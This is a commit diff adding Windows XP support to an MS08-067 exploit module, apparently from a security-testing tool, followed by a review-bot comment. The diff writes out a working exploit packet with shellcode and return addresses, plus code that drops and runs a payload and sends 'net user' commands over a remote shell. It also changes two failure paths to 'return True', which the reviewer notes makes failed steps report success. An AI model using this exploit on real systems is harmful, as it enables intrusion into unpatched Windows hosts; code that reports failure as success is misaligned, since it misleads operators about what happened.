Merge pull request #809 from VakarisZ/ms08-067
Added Windows XP support for win_ms08_067
This commit is contained in:
commit
7107e963fb
|
@ -50,6 +50,23 @@ OBFUSCATED_SHELLCODE = ("\xa9\xb6\x4a\x39\x56\x60\xb5\xba\xf6\xb2\xc0\x19\xc1\x6
|
||||||
|
|
||||||
SHELLCODE = clarify(OBFUSCATED_SHELLCODE)
|
SHELLCODE = clarify(OBFUSCATED_SHELLCODE)
|
||||||
|
|
||||||
|
XP_PACKET = ("\xde\xa4\x98\xc5\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x41\x00\x42\x00\x43"
|
||||||
|
"\x00\x44\x00\x45\x00\x46\x00\x47\x00\x00\x00\x36\x01\x00\x00\x00\x00\x00\x00\x36\x01"
|
||||||
|
"\x00\x00\x5c\x00\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47"
|
||||||
|
"\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48"
|
||||||
|
"\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49"
|
||||||
|
"\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a"
|
||||||
|
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x90"
|
||||||
|
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
|
||||||
|
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
|
||||||
|
"\x90\x90\x90\x90\x90\x90\x90" + SHELLCODE + "\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00"
|
||||||
|
"\x2e\x00\x5c\x00\x41\x00\x42\x00\x43\x00\x44\x00\x45\x00\x46\x00\x47\x00\x08\x04\x02"
|
||||||
|
"\x00\xc2\x17\x89\x6f\x41\x41\x41\x41\x07\xf8\x88\x6f\x41\x41\x41\x41\x41\x41\x41\x41"
|
||||||
|
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
||||||
|
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x90\x90\x90\x90\x90\x90\x90\x90"
|
||||||
|
"\xeb\x62\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x00\x00\xe8\x03\x00\x00\x02\x00\x00"
|
||||||
|
"\x00\x00\x00\x00\x00\x02\x00\x00\x00\x5c\x00\x00\x00\x01\x10\x00\x00\x00\x00\x00\x00")
|
||||||
|
|
||||||
# Payload for Windows 2000 target
|
# Payload for Windows 2000 target
|
||||||
PAYLOAD_2000 = '\x41\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00'
|
PAYLOAD_2000 = '\x41\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00'
|
||||||
PAYLOAD_2000 += '\x41\x41\x41\x41\x41\x41\x41\x41'
|
PAYLOAD_2000 += '\x41\x41\x41\x41\x41\x41\x41\x41'
|
||||||
|
@ -82,6 +99,7 @@ PAYLOAD_2003 += '\xba\x77\xf9\x75\xbd\x77\x00\x00'
|
||||||
class WindowsVersion(IntEnum):
|
class WindowsVersion(IntEnum):
|
||||||
Windows2000 = 1
|
Windows2000 = 1
|
||||||
Windows2003_SP2 = 2
|
Windows2003_SP2 = 2
|
||||||
|
WindowsXP = 3
|
||||||
|
|
||||||
|
|
||||||
class SRVSVC_Exploit(object):
|
class SRVSVC_Exploit(object):
|
||||||
|
@ -91,6 +109,7 @@ class SRVSVC_Exploit(object):
|
||||||
self._port = port
|
self._port = port
|
||||||
self._target = target_addr
|
self._target = target_addr
|
||||||
self._payload = PAYLOAD_2000 if WindowsVersion.Windows2000 == os_version else PAYLOAD_2003
|
self._payload = PAYLOAD_2000 if WindowsVersion.Windows2000 == os_version else PAYLOAD_2003
|
||||||
|
self.os_version = os_version
|
||||||
|
|
||||||
def get_telnet_port(self):
|
def get_telnet_port(self):
|
||||||
"""get_telnet_port()
|
"""get_telnet_port()
|
||||||
|
@ -129,6 +148,8 @@ class SRVSVC_Exploit(object):
|
||||||
return sock
|
return sock
|
||||||
|
|
||||||
def _build_dce_packet(self):
|
def _build_dce_packet(self):
|
||||||
|
if self.os_version == WindowsVersion.WindowsXP:
|
||||||
|
return XP_PACKET
|
||||||
# Constructing Malicious Packet
|
# Constructing Malicious Packet
|
||||||
dce_packet = '\x01\x00\x00\x00'
|
dce_packet = '\x01\x00\x00\x00'
|
||||||
dce_packet += '\xd6\x00\x00\x00\x00\x00\x00\x00\xd6\x00\x00\x00'
|
dce_packet += '\xd6\x00\x00\x00\x00\x00\x00\x00\xd6\x00\x00\x00'
|
||||||
|
@ -157,7 +178,8 @@ class Ms08_067_Exploiter(HostExploiter):
|
||||||
_TARGET_OS_TYPE = ['windows']
|
_TARGET_OS_TYPE = ['windows']
|
||||||
_EXPLOITED_SERVICE = 'Microsoft Server Service'
|
_EXPLOITED_SERVICE = 'Microsoft Server Service'
|
||||||
_windows_versions = {'Windows Server 2003 3790 Service Pack 2': WindowsVersion.Windows2003_SP2,
|
_windows_versions = {'Windows Server 2003 3790 Service Pack 2': WindowsVersion.Windows2003_SP2,
|
||||||
'Windows Server 2003 R2 3790 Service Pack 2': WindowsVersion.Windows2003_SP2}
|
'Windows Server 2003 R2 3790 Service Pack 2': WindowsVersion.Windows2003_SP2,
|
||||||
|
'Windows 5.1': WindowsVersion.WindowsXP}
|
||||||
|
|
||||||
def __init__(self, host):
|
def __init__(self, host):
|
||||||
super(Ms08_067_Exploiter, self).__init__(host)
|
super(Ms08_067_Exploiter, self).__init__(host)
|
||||||
|
@ -231,7 +253,7 @@ class Ms08_067_Exploiter(HostExploiter):
|
||||||
break
|
break
|
||||||
|
|
||||||
if not remote_full_path:
|
if not remote_full_path:
|
||||||
return False
|
return True
|
||||||
|
|
||||||
# execute the remote dropper in case the path isn't final
|
# execute the remote dropper in case the path isn't final
|
||||||
if remote_full_path.lower() != self._config.dropper_target_path_win_32.lower():
|
if remote_full_path.lower() != self._config.dropper_target_path_win_32.lower():
|
||||||
|
@ -251,7 +273,7 @@ class Ms08_067_Exploiter(HostExploiter):
|
||||||
sock.send(("net user %s /delete\r\n" % (self._config.user_to_add,)).encode())
|
sock.send(("net user %s /delete\r\n" % (self._config.user_to_add,)).encode())
|
||||||
except Exception as exc:
|
except Exception as exc:
|
||||||
LOG.debug("Error in post-debug phase while exploiting victim %r: (%s)", self.host, exc)
|
LOG.debug("Error in post-debug phase while exploiting victim %r: (%s)", self.host, exc)
|
||||||
return False
|
return True
|
||||||
finally:
|
finally:
|
||||||
try:
|
try:
|
||||||
sock.close()
|
sock.close()
|
||||||
|
|
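Review bot: The two `return True` lines in the hunks at `@ -231,7 +253,7 @@` and `@ -251,7 +273,7 @@` turn failure paths into reported successes: the first fires when `remote_full_path` is empty (no dropper was placed), the second inside `except Exception` after the post-exploitation phase failed, so the exploiter's result no longer reflects what actually happened on the host, and it changes for every mapped version rather than only the new XP entry. If the XP path genuinely cannot complete the post-exploitation step, gate the result on the version instead of flipping both returns, otherwise restore `return False` in both places; either way add a comment stating why a failed phase counts as success. The enclosing method starts and ends outside both hunks, so its other exit points are not visible here. In the `@ -91,6 +109,7 @@` hunk `self._payload` still falls through to `PAYLOAD_2003` for XP, which is presumably unused on that path since `_build_dce_packet` returns `XP_PACKET` early, but a one-line comment there would make that intent explicit. The `'Windows 5.1'` key in the `_windows_versions` hunk carries no service-pack qualifier unlike the 2003 entries; if the match is exact, confirm that is the string the scanner reports.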